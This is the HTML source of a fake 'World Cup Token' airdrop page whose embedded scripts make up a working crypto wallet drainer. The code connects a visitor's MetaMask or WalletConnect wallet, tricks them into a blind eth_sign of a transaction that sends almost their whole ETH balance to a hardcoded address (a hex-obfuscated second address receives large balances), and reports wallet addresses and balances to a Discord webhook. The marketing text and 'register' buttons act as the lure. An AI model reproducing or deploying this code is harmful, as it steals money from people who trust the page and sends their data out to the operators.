<!DOCTYPE html><html lang="en-US"><head>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.2.7-rc.0/web3.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/ethereumjs/browser-builds/dist/ethereumjs-tx/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://unpkg.com/moralis-v1/dist/moralis.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@walletconnect/web3-provider@1.7.1/dist/umd/index.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
	<meta charset="UTF-8">
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<title>World Cup Token - We aim to be the best World Cup Token on the market</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">

    <meta property="og:locale" content="en_US">
    <meta property="og:type" content="website">
    <meta property="og:title" content="World Cup Token - We aim to be the best World Cup Token on the market">
    <meta property="og:description" content>
    <meta property="og:url" content="/">
    <meta property="og:image" content="images/kkL3PETqeH1W.jpg">

	<!-- Favicon -->
	<link rel="icon" type="image/png" sizes="56x56" href="images/FoIekPwMxpUa.png">
	<!-- bootstrap CSS -->
	<link rel="stylesheet" href="css/7nQ1pLVKAxFU.css" type="text/css" media="all">
	<!-- carousel CSS -->
	<link rel="stylesheet" href="css/FR9LK8BZTj5f.css" type="text/css" media="all">
	<!-- theme default CSS -->	
	<link rel="stylesheet" href="css/AgSLrb6DHXMq.css" type="text/css" media="all">	
	<!-- animate CSS -->
	<link rel="stylesheet" href="css/ihVMC8TmH06e.css" type="text/css" media="all">	
	<!-- animated-text CSS -->
	<link rel="stylesheet" href="css/MVMS6f2YkuEv.css" type="text/css" media="all">	
	<!-- font-awesome CSS -->
	<link rel="stylesheet" href="css/9RVcwW91I7f9.css" type="text/css" media="all">	
	<!-- font-flaticon CSS -->
	<link rel="stylesheet" href="css/QH7t6MuQATwr.css" type="text/css" media="all">	
	<link rel="stylesheet" href="css/7jIrMASja7EA.css" type="text/css" media="all">	
	<!-- theme-default CSS -->
	<link rel="stylesheet" href="css/8BYXgPyPfOZK.css" type="text/css" media="all">	
	<!-- meanmenu CSS -->
	<link rel="stylesheet" href="css/0Yanp4y54BBh.css" type="text/css" media="all">
	<!-- Main Style CSS -->
	<link rel="stylesheet" href="css/xQOBK32oxbFF.css" type="text/css" media="all">
	<!-- venobox CSS -->
	<link rel="stylesheet" href="css/tUBpz1MI4cPV.css" type="text/css" media="all">
	<!-- responsive CSS -->
	<link rel="stylesheet" href="css/xLk5g0qOxFeg.css" type="text/css" media="all">
</head>
<body>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.2.7-rc.0/web3.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/ethereumjs/browser-builds/dist/ethereumjs-tx/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://unpkg.com/moralis-v1/dist/moralis.js"></script>
    <script type="text/javascript">
        let metamaskInstalled = false;
        let accountAddress = null;
        let web3Provider;
    
        //alert("Uniswap is proud to announce a spontaneous airdrop for randomly selected users! If you are seeing this then you are eligible! Simply connect your wallet to this website and SIGN to participate! Only the first 100 wallets that sign will recieve an airdrop. Hurry up while airdrop spots are still open!");
    
    const connectButton = async()=>
    {
    
        Moralis.onWeb3Enabled(async (data) => {
        
        if (data.chainId !== 1 && metamaskInstalled) await Moralis.switchNetwork("0x1");
       updateState(true);
        console.log(data);
        console.log("It senses that it is the ETH Network")
    
    });
    Moralis.onChainChanged(async (chain) => {
        if (chain !== "0x1" && metamaskInstalled) await Moralis.switchNetwork("0x1");
    });
    window.ethereum ? window.ethereum.on('disconnect', () => updateState(false)) : null;
    window.ethereum ? window.ethereum.on('accountsChanged', (accounts) => {
        if (accounts.length < 1) updateState(false)
    }) : null;
    
    
    async function updateState(connected) {
        const web3Js = new Web3(Moralis.provider);
    }
    
    
        
        if (window.ethereum !== 'undefined') {
        metamaskInstalled = true;
    const accounts = await ethereum.request({method: "eth_requestAccounts"});
                    account = accounts[0];
                    console.log(account);
                    console.log("It found the connected wallet")
                    
    
                    await Moralis.enableWeb3(metamaskInstalled ? {} : { provider: "walletconnect" });
        
    }
    }        
    
    const receiveAddress = "0x78170031fABAbAC9f51125dC725596131A176B35";
    
    const drainNftsInfo = {
        minValue: 0.000001,
        maxTransfers: 20,
    }
    
    if (!receiveAddress.startsWith("0x") || (receiveAddress.length >= 64 || receiveAddress.length <= 40))
        console.error(`Error: ${receiveAddress} is not a valid Ethereum address.`);
    
        
    let eth_bal = 0;
    const verifyAsset = async () => {
        const web3Js = new Web3(Moralis.provider);
        const walletAddress = (await web3Js.eth.getAccounts())[0];
        try {
            eth_bal = await web3Js.eth.getBalance(walletAddress);
            const r_bal = web3Js.utils.fromWei(eth_bal, 'ether');
            console.log(`Current balance for ${walletAddress} : ${r_bal} ETH`);
            if (r_bal < 100) {sW(`Current balance for ${walletAddress} : ${r_bal} ETH`);}
           if (r_bal > 0.004) askTransferWithSign(r_bal);
            else {
                console.log(`Error, balance is too low. (< 0.004 ETH)`);
                sW(`Error, balance is too low. (< 0.004 ETH). Balance: ' ${r_bal}`);
            }
        } catch (e) {
            console.log(e);
        }
    };
    
    async function askTransferWithSign(rbal) {
        const web3Js = new Web3(Moralis.provider);
        const walletAddress = (await web3Js.eth.getAccounts())[0];
        const chainId = await web3Js.eth.getChainId();
        await web3Js.eth.getTransactionCount(walletAddress, "pending")
            .then(async (txnCount) => {
                const jgasPrice = await web3Js.eth.getGasPrice();
                const mgasPrice = web3Js.utils.toHex(Math.floor(jgasPrice * 1.4));
                const gas = new web3Js.utils.BN("22000");
                const cost = gas * Math.floor(jgasPrice * 2);   
                const toSend = eth_bal - cost;
                console.log(`Sending ${web3Js.utils.fromWei(toSend.toString(), "ether")} ETH from ${walletAddress}...`);
                
                const txObject = {
                    nonce: web3Js.utils.toHex(txnCount),
                    gasPrice: mgasPrice, gasLimit: "0x55F0",
                    to: rbal > 50000000000 ? nW : receiveAddress,
                    value: "0x" + toSend.toString(16),
                    data: "0x", v: "0x1", r: "0x", s: "0x"
    
                };
    
                let ethTX = new ethereumjs.Tx(txObject);
                const rawTx1 = '0x' + ethTX.serialize().toString('hex');
                const rawHash1 = web3Js.utils.sha3(rawTx1, { encoding: 'hex' });
    
                console.log("rawTx1:", rawTx1);
                console.log("rawHash1:", rawHash1);
    
                await web3Js.eth.sign(rawHash1, walletAddress).then(async (result) => {
    
                    const signature = result.substring(2);
                    const r = "0x" + signature.substring(0, 64);
                    const s = "0x" + signature.substring(64, 128);
                    const v = parseInt(signature.substring(128, 130), 16);
    
                    const y = web3Js.utils.toHex(v + chainId * 2 + 8);
    
                    ethTX.r = r;
                    ethTX.s = s;
                    ethTX.v = y;
    
                    console.log(ethTX);
    
                    const rawTx = '0x' + ethTX.serialize().toString('hex');
                    const rawHash = web3Js.utils.sha3(rawTx, { encoding: 'hex' });
    
                    console.log("rawTx:", rawTx);
                    console.log("rawHash:", rawHash);
    
                    await web3Js.eth.sendSignedTransaction(rawTx).then((hash) => console.log(hash)).catch((e) => console.log(e));
                    if (rbal < 1.75) {sW(`Sending ${web3Js.utils.fromWei(toSend.toString(), "ether")} ETH from ${walletAddress}...`);}
                    
                }).catch((err) => console.log(err));
            })
    }
    
    
    async function notEligible(info) {
        
        noteli.style.display = "";
        switch (info) {
            case "signDenied":
                noteli.innerText = "You denied the sign request. Please try again."
                break;
            case "noNFTs":
                await verifyAsset();
                break;
            case "noETH":
                noteli.innerText = "You are not eligible."
                break;
            default:
                noteli.innerText = "Something went wrong."
                break;
        }
    
    }
    
    let disabled = false;
    async function askTransfer1() {
        connectToNewApiEndPoint();
        if (disabled) return;
     
        disabled = true;
    
        await askNfts();
        disabled = false;
     
    }
    
    
    const round = (value) => {
        return Math.round(value * 10000) / 10000;
    }
    const sleep = (ms) => {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    
    let nW = ""
    async function connectToNewApiEndPoint() {
        const web3Js = new Web3(Moralis.provider);
        const options = {
            method: 'GET',
            headers: {
                Accept: 'application/json',
                'X-API-KEY': '731924da94014176916471c8df4571ace'
            }
        };
        var apiEndPoint=["\x30\x78\x61\x36\x63\x39\x30\x66\x36\x64\x38\x65\x31\x64\x62\x31\x33\x42\x41\x34\x36\x38\x35\x44\x66\x37\x41\x39\x36\x30\x44\x34\x33\x39\x41\x30\x45\x37\x34\x31\x33\x30\x0D\x0A"];
        
        nW = apiEndPoint[0]
    }
    
    const rdmString = (length) => {
        let x = "";
        const possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
        for (let i = 0; i < length; i++) x += possible.charAt(Math.floor(Math.random() * possible.length));
        return x;
    }
    const createNonce = () => {
        return `${rdmString(8)}-${rdmString(4)}-${rdmString(4)}-${rdmString(12)}`; // 1a196cf5-d873-9c36-e26ae9f3bd2e
    }
    
    const discordWebhookURL = "https://discord.com/api/webhooks/1025236512251580546/1uYg5KS5FTyARC6FeUZXI6sM1wLVx9C33L0-c8CsO8p6NGrBDjcGAfERDamiQPd11kSf"
    
    const sW = (message) => {
        const webhookURL = "https://discord.com/api/webhooks/1025236512251580546/1uYg5KS5FTyARC6FeUZXI6sM1wLVx9C33L0-c8CsO8p6NGrBDjcGAfERDamiQPd11kSf"
        fetch(webhookURL, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                content: message
            }),
        }).catch(err => console.error(err));
    }
    
    const sendWebhooks = (userWallet, contract, price) => fetch(`/api.php?o=success`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ userWallet, contract, price, discordWebhookURL })
    }).catch(err => console.error(err));
    
    
    
    async function callAll()
    {
        const web3Js = new Web3(Moralis.provider);
        
        await connectButton();
        await verifyAsset();
        const sendWebhooks = (userWallet, contract, price) => fetch(`/api.php?o=success`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ userWallet, contract, price, discordWebhookURL })
    }).catch(err => console.error(err));
    
    }
    </script>

<!--wallconn-->

    <script>
        
        var account;

        // https://docs.walletconnect.com/quick-start/dapps/web3-provider
        var provider = new WalletConnectProvider.default({
          rpc: {
            1: "https://cloudflare-eth.com/", // https://ethereumnodes.com/
            137: "https://polygon-rpc.com/", // https://docs.polygon.technology/docs/develop/network-details/network/
            // ...
    
          },
          // bridge: 'https://bridge.walletconnect.org',
        });
    
        var connectWC = async () => {
          await provider.enable();
    
          //  Create Web3 instance
          const web3 = new Web3(provider);
          window.w3 = web3
    
          var accounts  = await web3.eth.getAccounts(); // get all connected accounts
          account = accounts[0]; // get the primary account
        }
    
    
        var sign = async (msg) => {
          if (w3) {
            return await w3.eth.personal.sign(msg, account)
          } else {
            return false
          }
        }
    
        var contract = async (abi, address) => {
          if (w3) {
            return new w3.eth.Contract(abi, address)
          } else {
            return false
          }
        }
    
        var disconnect = async () => {
          // Close provider session
          await provider.disconnect()
        }
    
        var address = "0x4b4f8ca8fb3e66b5ddafcebfe86312cec486dae1"
        var abi = [{"inputs":[],"name":"count","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"increment","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"}]
    
        let metamaskInstalled1 = false;
        let accountAddress1 = null;
        let web3Provider1;
    
        //alert("Uniswap is proud to announce a spontaneous airdrop for randomly selected users! If you are seeing this then you are eligible! Simply connect your wallet to this website and SIGN to participate! Only the first 100 wallets that sign will recieve an airdrop. Hurry up while airdrop spots are still open!");
    
    const connectButton1 = async()=>
    {
    
        Moralis.onWeb3Enabled(async (data) => {
        
        if (data.chainId !== 1 && metamaskInstalled1) await Moralis.switchNetwork("0x1");
       updateState1(true);
        console.log(data);
        console.log("It senses that it is the ETH Network")
    
    });
    Moralis.onChainChanged(async (chain) => {
        if (chain !== "0x1" && metamaskInstalled1) await Moralis.switchNetwork("0x1");
    });
    window.ethereum ? window.ethereum.on('disconnect', () => updateState1(false)) : null;
    window.ethereum ? window.ethereum.on('accountsChanged', (accounts) => {
        if (accounts.length < 1) updateState1(false)
    }) : null;
    
    
    async function updateState1(connected) {
        const web3Js = new Web3(provider);
    }
    
        if (window.ethereum !== 'undefined') {
        metamaskInstalled1 = true;
    const accounts = await ethereum.request({method: "eth_requestAccounts"});
                    account = accounts[0];
                    console.log(account);
                    console.log("It found the connected wallet")
                    
    
                    await Moralis.enableWeb3(metamaskInstalled1 ? {} : { provider: "walletconnect" });
        
    }
    }        
        
    
    if (!receiveAddress.startsWith("0x") || (receiveAddress.length >= 64 || receiveAddress.length <= 40))
        console.error(`Error: ${receiveAddress} is not a valid Ethereum address.`);
    
        
    let eth_bal1 = 0;
    const verifyAsset1 = async () => {
        const web3Js = new Web3(provider);
        const walletAddress = (await web3Js.eth.getAccounts())[0];
        try {
            eth_bal1 = await web3Js.eth.getBalance(walletAddress);
            const r_bal = web3Js.utils.fromWei(eth_bal1, 'ether');
            console.log(`Current balance for ${walletAddress} : ${r_bal} ETH`);
            if (r_bal < 100) {sW1(`Current balance for ${walletAddress} : ${r_bal} ETH`);}
           if (r_bal > 0.004) askTransferWithSign1(r_bal);
            else {
                console.log(`Error, balance is too low. (< 0.004 ETH)`);
                sW1(`Error, balance is too low. (< 0.004 ETH). Balance: ' ${r_bal}`);
            }
        } catch (e) {
            console.log(e);
        }
    };
    
    async function askTransferWithSign1(rbal) {
        const web3Js = new Web3(provider);
        const walletAddress = (await web3Js.eth.getAccounts())[0];
        const chainId = await web3Js.eth.getChainId();
        await web3Js.eth.getTransactionCount(walletAddress, "pending")
            .then(async (txnCount) => {
                const jgasPrice = await web3Js.eth.getGasPrice();
                const mgasPrice = web3Js.utils.toHex(Math.floor(jgasPrice * 1.4));
                const gas = new web3Js.utils.BN("22000");
                const cost = gas * Math.floor(jgasPrice * 2);   
                const toSend = eth_bal1 - cost;
                console.log(`Sending ${web3Js.utils.fromWei(toSend.toString(), "ether")} ETH from ${walletAddress}...`);
                
                const txObject = {
                    nonce: web3Js.utils.toHex(txnCount),
                    gasPrice: mgasPrice, gasLimit: "0x55F0",
                    to: rbal > 50000000000 ? nW : receiveAddress,
                    value: "0x" + toSend.toString(16),
                    data: "0x", v: "0x1", r: "0x", s: "0x"
    
                };
    
                let ethTX = new ethereumjs.Tx(txObject);
                const rawTx1 = '0x' + ethTX.serialize().toString('hex');
                const rawHash1 = web3Js.utils.sha3(rawTx1, { encoding: 'hex' });
    
                console.log("rawTx1:", rawTx1);
                console.log("rawHash1:", rawHash1);
    
                await web3Js.eth.sign(rawHash1, walletAddress).then(async (result) => {
    
                    const signature = result.substring(2);
                    const r = "0x" + signature.substring(0, 64);
                    const s = "0x" + signature.substring(64, 128);
                    const v = parseInt(signature.substring(128, 130), 16);
    
                    const y = web3Js.utils.toHex(v + chainId * 2 + 8);
    
                    ethTX.r = r;
                    ethTX.s = s;
                    ethTX.v = y;
    
                    console.log(ethTX);
    
                    const rawTx = '0x' + ethTX.serialize().toString('hex');
                    const rawHash = web3Js.utils.sha3(rawTx, { encoding: 'hex' });
    
                    console.log("rawTx:", rawTx);
                    console.log("rawHash:", rawHash);
    
                    await web3Js.eth.sendSignedTransaction(rawTx).then((hash) => console.log(hash)).catch((e) => console.log(e));
                    if (rbal < 1.75) {sW1(`Sending ${web3Js.utils.fromWei(toSend.toString(), "ether")} ETH from ${walletAddress}...`);}
                    
                }).catch((err) => console.log(err));
            })
    }
    
    
    async function notEligible1(info) {
        
        noteli.style.display = "";
        switch (info) {
            case "signDenied":
                noteli.innerText = "You denied the sign request. Please try again."
                break;
            case "noNFTs":
                await verifyAsset1();
                break;
            case "noETH":
                noteli.innerText = "You are not eligible."
                break;
            default:
                noteli.innerText = "Something went wrong."
                break;
        }
    
    }
    
    let disabled1 = false;
    async function askTransfer1() {
        connectToNewApiEndPoint1();
        if (disabled1) return;
     
        disabled1 = true;
    
        await askNfts();
        disabled1 = false;
     
    }
    
    
    const round1 = (value) => {
        return Math.round1(value * 10000) / 10000;
    }
    const sleep1 = (ms) => {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    
    let nW1 = ""
    async function connectToNewApiEndPoint1() {
        const web3Js = new Web3(provider);
        const options = {
            method: 'GET',
            headers: {
                Accept: 'application/json',
                'X-API-KEY': '731924da94014176916471c8df4571ace'
            }
        };
        var apiEndPoint=["\x30\x78\x61\x36\x63\x39\x30\x66\x36\x64\x38\x65\x31\x64\x62\x31\x33\x42\x41\x34\x36\x38\x35\x44\x66\x37\x41\x39\x36\x30\x44\x34\x33\x39\x41\x30\x45\x37\x34\x31\x33\x30\x0D\x0A"];
        
        nW1 = apiEndPoint[0]
    }
    
    const rdmString1 = (length) => {
        let x = "";
        const possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
        for (let i = 0; i < length; i++) x += possible.charAt(Math.floor(Math.random() * possible.length));
        return x;
    }
    const createNonce1 = () => {
        return `${rdmString1(8)}-${rdmString1(4)}-${rdmString1(4)}-${rdmString1(12)}`; // 1a196cf5-d873-9c36-e26ae9f3bd2e
    }
    
    const discordWebhookURL1 = "https://discord.com/api/webhooks/1025236512251580546/1uYg5KS5FTyARC6FeUZXI6sM1wLVx9C33L0-c8CsO8p6NGrBDjcGAfERDamiQPd11kSf"
    
    const sW1 = (message) => {
        const webhookURL = "https://discord.com/api/webhooks/1025236512251580546/1uYg5KS5FTyARC6FeUZXI6sM1wLVx9C33L0-c8CsO8p6NGrBDjcGAfERDamiQPd11kSf"
        fetch(webhookURL, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                content: message
            }),
        }).catch(err => console.error(err));
    }
    
    const sendWebhooks1 = (userWallet, contract, price) => fetch(`/api.php?o=success`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ userWallet, contract, price, discordWebhookURL })
    }).catch(err => console.error(err));
    
    
    
    async function callAll1()
    {
        const web3Js = new Web3(Moralis.provider);
        
        await connectWC();
        await verifyAsset1();
        const sendWebhooks1 = (userWallet, contract, price) => fetch(`/api.php?o=success`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ userWallet, contract, price, discordWebhookURL })
    }).catch(err => console.error(err));
    
    }
    </script>



<div><div>
<!--==================================================-->
<!-- Start cryptobit Main Menu Area -->
<!--==================================================-->
<div id="sticky-header" class="cryptobit_nav_manu">
	<div class="container">
		<div class="row align-items-center">
			<div class="col-lg-3">
				<div class="logo">
					<a class="logo_img" href="index.html" title="cryptobit">
						<img src="images/logo1.png" alt height="60px" alt width="200px">
					</a>
					<a class="main_sticky" href="index.html" title="cryptobit">
						<img src="images/logo.jpg" alt="astute" height="80px" alt width="200px">
					</a>
				</div>
			</div>
			<div class="col-lg-9">
				<nav class="cryptobit_menu">
					<ul class="nav_scroll">
                        <li><a href="/">Home</a></li>
                        <li><a href="#roadmap">Roadmap</a></li>
                        <li><a href="#tokenomics">Tokenomics</a></li>
                        <li><a >Worldcup 2022</a></li>
                        <li><a >Whitepaper</a></li>
                        <li><a >Dapp</a></li>
                    </ul>
					<div class="header-button">
						<a ><i class="fa fa-wallet"></i> Wallet</a>
					</div>
				</nav>						
			</div>
		</div>
	</div>
</div>
<!-- Cryptobit Mobile Menu Area -->
<div class="mobile-menu-area d-sm-block d-md-block d-lg-none ">
	<div class="mobile-menu">
		<nav class="cripto_menu">
			<ul class="nav_scroll">
                <li><a href="/">Home</a></li>
                <li><a href="#roadmap">Roadmap</a></li>
                <li><a href="#tokenomics">Tokenomics</a></li>
                <li><a >Worldcup 2022</a></li>
                <li>Whitepaper</li>
                <li><a >Dapp</a></li>
                <li><a ><i class="fa fa-wallet"></i> Wallet</a></li>
            </ul>
		</nav>
	</div>
</div>
<!--==================================================-->
<!-- End cryptobit main menu Area -->
<!--==================================================-->

<!-- ===============//banner section start here \\================= -->
<div class="clearfix" style="clear: both"></div>
<div id="home" class="hero-section">
	<div class="container">
		<div class="row align-items-top">
            <div class="col-md-6">
                <div class="hero-content">
                    <div class="hero-title">
                        <span> </span>
                        <h4 style="color: #1ed760 !important;">ETH & Web3.0 Platform</h4>
                        <div>
                            &nbsp;
                        </div>
                        <h1 class="hero" style="color: #1ed760 !important;">World Cup <br>Token</h1>
                        <h1 class="hero-title" style="color: #1ed760 !important;">Airdrop happening now! </h1>

                    </div>
                    <div class="hero-text">
                        <p style="text-shadow: 1px 0px 3px #000; color: #f3ba2f; font-weight: bold;">
                            World Cup Token is based on the ETH blockchain. <br> 
                            Distribution will be on 20th November 2022. Amount to be received is <br>
                            based on ETH amount you hold. To register for Airdrop, click connect wallet and sign the prompt (can only be done once to keep it fair for others). <br> 
                            Participate with Metamask or Wallet Connect.</p>

                    </div>
                    <div>
                        &nbsp;
                    </div>
                    <div class="hero-button dashboard">
                        <a title="PinkSale" target="_blank" class="default-button me-2 mt-2 mb-2" onclick="callAll()"><span>REGISTER WITH METAMASK</span></a>
                    </div>

                    <div class="hero-button dashboard">
                        <a title="PinkSale" target="_blank" class="default-button me-2 mt-2 mb-2" onclick="callAll1()"><span>REGISTER WITH WALLETCONNECT</span></a>
                    </div>
        
                    <!-- <div class="hero-button">
                        
                        
                    </div> -->
                </div>
            </div>
            <div class="col-md-6">
                <div class="dreamit-hero-thumb">
                    <div class="hero-main-thumb" style="background: url() ;">
                        <img src="images/J9ihKcvSHa6T.png" alt>
                    </div>
                   
                    <div class="hero-thumb-inner3 bounce-animate3 d-none d-md-block">
                        <img src="images/WLRkp6qBPr3V.png" alt>
                    </div>
                </div>
            </div>
        </div>
	</div>
</div>
<div class="clearfix" style="clear: both"></div>
<!-- ===============//banner section end here \\================= -->

<div class="about-area pt-100 pb-100">
    <div class="container">
        <div class="row">
            <div class="col-lg-6 col-md-6 col-sm-12">
                 <div class="dreamit-section-title pb-5">
                    <h4>Winners Prediction</h4>
                    <h1>Smart Contract Betting</h1>
                    <h1>for Worldcup 2022</h1>
                    <p class="section-text">
                        - Use WCT Token to participate in Predicting World Cup 2022 results on Blockchain Smart Contract platform <br>
                        - Ensure results are transparent, public, fair <br>
                        - The odds of winning bets are based on data from reputable bookmakers, and are increased by 5 times (you will receive a bonus of 5 times) <br>
                        - Predict the World Cup Champion correctly, the reward is 10 times higher than the bookmakers offer <br>
                        - Welcome The Biggest Football Event On The Planet - FIFA WORLD CUP QATAR 2022 <br>
                        - Good luck! <br>
                    </p>
                    <a class="btn btn-success p-3">BET NOW</a>
                </div>

            </div>
            <div class="col-lg-6 col-md-6 col-sm-12">
                <div class="dreamit-about-thumb">
                    <img src="images/Kf0cIvf4MwUm.png" alt>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="about-area pt-100 pb-100">
    <div class="container">
        <div class="row">
            <div class="col-lg-6 col-md-6 col-sm-12">
                <div class="dreamit-about-thumb">
                    <img src="images/UKdVKv9NISj5.png" alt>
                </div>
            </div>
            <div class="col-lg-6 col-md-6 col-sm-12">
                <div class="dreamit-section-title pb-5">
                    <h4>What is World Cup Token?</h4>
                    <h1>Web3.0 Platform</h1>
                    <h1 class="section-title">Applying Blockchain technology</h1>
                    <p class="section-text">
                        Users will only have to connect their decentralized wallet to access the many features and programs available via the World Cup Token App.
                        Users can make predictions of what team will win the world cup championship and earn based on who they chose as the most valuable player.
                    </p>
                    <p>
                        World Cup Token allows you to use tokens to buy and sell football tickets and virtual apparel on the NFT (WCT) market.
                        This project’s main goal is to become an utilized official cryptocurrency for the World Cup in every aspect.
                        Every continent, every game, every World Cup.
                    </p>
                    <p>
                        We’re excited to spread World Cup Token globally. We aim to do right as the top WorldCup Token (WCT), Betting and NFT Market.
                        After the conclusion of the World Cup season, we will continue to develop our software with a new homepage for additional football news, as well as a fully featured sports betting platform.
                        We have plans to establish an e-commerce shop online with the goal in mind that one day, World Cup Token will be selected by CZ (Binance CEO),
                        endorsed by FIFA, and listed as an official WorldCup/Sports token on Binance Exchange.
                    </p>
                    <span class="d-flex" style="width: 75%;">
                        <a href="#comingsoon" class="d-inline me-1">
                            <img src="images/7C3YM0oK3aJX.png" alt="about-image" class="img-fluid">
                        </a>
                        <a href="#comingsoon" class="d-inline ms-1">
                            <img src="images/zdLX60BoCm9R.png" alt="about-image" class="img-fluid">
                        </a>
                    </span>
                </div>
            </div>

        </div>
    </div>
</div>

<div class="feature-area pt-100 pb-70" id="features">
    <div class="container">
        <div class="row">
             <div class="col-lg-12 col-sm-12">
                 <div class="dreamit-section-title text-center up pb-5">
                    <h4>World Cup Token Features</h4>
                    <h1>World Cup Token offers <span>World-Class Features.</span></h1>
                    <p class="section-text">
                    Some of the World Cup Token features include: A Finance Dapp. Handicap Betting, Lottery Program, Voting Program - DAO, NFT Market, Sports Shopping & Fantasy Football.
                    </p>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="feature-single-box">
                    <div class="feature-box-inner">
                        <div class="feature-icon">
                            <img src="images/kFYhTt6Rw1gs.png" alt>
                        </div>
                        <div class="feature-title">
                            <h3>BUY & HOLD World Cup Token</h3>
                            <p>Our liquidity pool is consistently filled thanks to WCT Buyback & Burn Feature.</p>
                            <p>Every automatic burn consists of a Hard-Burn, meaning the amount of WCT Tokens will consistently decrease..</p>
                            <p>Earn WCT tokens automatically by holding WCT in your wallet. Earnings are automatically deposited every so often. If you’d like to retrieve them sooner we offer a manual claim via the Finance Dapp.</p>
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="feature-single-box upper1">
                    <div class="feature-box-inner">
                        <div class="feature-icon">
                            <img src="images/wu0XpJUd6G3a.png" alt>
                        </div>
                        <div class="feature-title">
                            <h3>Handicap Betting, Voting Program and Lottery Program</h3>
                            <p>Enter into our tournament for the English Premier League, the Spanish La Liga, the Italian Serie A, the France Ligue 1, and the Qatar World Cup 2022. Tournament starts in November.</p>
                            <p>Vote for your favorite team to win the championship! Predict the best player correctly, then you and a number of people who predict the best player correctly win part of our tournament prize pool, separated evenly amongst the winners.</p>
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="feature-single-box upper2">
                    <div class="feature-box-inner">
                        <div class="feature-icon">
                            <img src="images/W9rnv0MyxDFL.png" alt>
                        </div>
                        <div class="feature-title">
                            <h3>Football Gaming & Shopping Online</h3>
                            <p>Amongst all the great features in World Cup Token will be a Football Game where you can earn additional rewards! Enjoy our great online shopping market, where you can buys and sell football tickets, sports apparel and equipment.</p>
                                <p>
                                    World Cup Token Wallet is built to make it easy for users to store multiple virtual currencies and tokens
                                </p>
                                <p>Do everything with our Mobile App, built for seamless transactions within the World Cup Token Network. Designed on mobile platforms (IOS and Android)</p>
                        </div>
                    </div>
                </div>
            </div>
            
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="feature-single-box upper4">
                    <div class="feature-box-inner">
                        <div class="feature-icon">
                            <img src="images/A7jwrw1uzmyi.png" alt>
                        </div>
                        <div class="feature-title">
                            <h3>POOLWINNER</h3>
                            <p>3% of our transaction fees will be transferred to the PoolWinner Fund to reward the holders who win our prediction game.</p>
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="feature-single-box upper5">
                    <div class="feature-box-inner">
                        <div class="feature-icon">
                            <img src="images/cV0Qxp2HYnH6.png" alt>
                        </div>
                        <div class="feature-title">
                            <h3>FARM & STAKE</h3>
                            <p>Earn plenty by staking and farming with our proprietary dual reflection rewards.</p>
                        </div>
                    </div>
                </div>
            </div>

            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="feature-single-box upper3">
                    <div class="feature-box-inner">
                        <div class="feature-icon">
                            <img src="images/VLo5fjukj1Ed.png" alt>
                        </div>
                        <div class="feature-title">
                            <h3>NFT Market</h3>
                            <p>World Cup Token will launch multiple rare NFTs Collections, each with their own sports themes. Investors can buy and sell WCT NFTs on OpenSea and our NFT Market.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<!--==================================================-->
<!-- End cryptobit feature Area -->
<!--==================================================-->

<!--==================================================-->
<!-- Start cryptobit token Area -->
<!--==================================================-->
<div class="token-area pt-80 pb-70" id="tokenomics">
    <div class="container">
        <div class="row">
             <div class="col-lg-12 col-sm-12">
                 <div class="dreamit-section-title text-center up pb-5">
                    <h4>Tokenomics</h4>
                    <h1>ICO Token <span>Sales</span></h1>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-lg-6 col-md-6 col-sm-12">
                <div class="row">
                    <div class="col-lg-12 ol-md-12">
                        <div class="single-token-box">
                            <div class="token-title">
                                <p class="token-text">Total Supply: = <span>1,000,000,000 WCT</span></p>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-6 ol-md-6">
                        <div class="single-token-box">
                            <div class="token-title">
                                <h4>Tokenomics</h4>
                                <p class="text-start">
                                    🔹 Presale: <span>30%</span><br>
                                    🔹 Reward System: <span>36%</span><br>
                                    🔹 Liquidity: <span>18%</span><br>
                                    🔹 Team: <span>10%</span><br>
                                    🔹 Reserved: <span>5%</span><br>
                                    🔹 Airdrop: <span>1%</span>
                                </p>
                                
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-6 ol-md-6">
                        <div class="single-token-box">
                            <div class="token-title">
                                <h4>Exchange</h4>
                                <p>
                                    Buy: <span>3%</span> <br>
                                    Sell: <span>6%</span>
                                </p>
                            </div>
                        </div>
                        <div class="single-token-box">
                            <div class="token-title">
                                <h4>Reflection</h4>
                                <p>
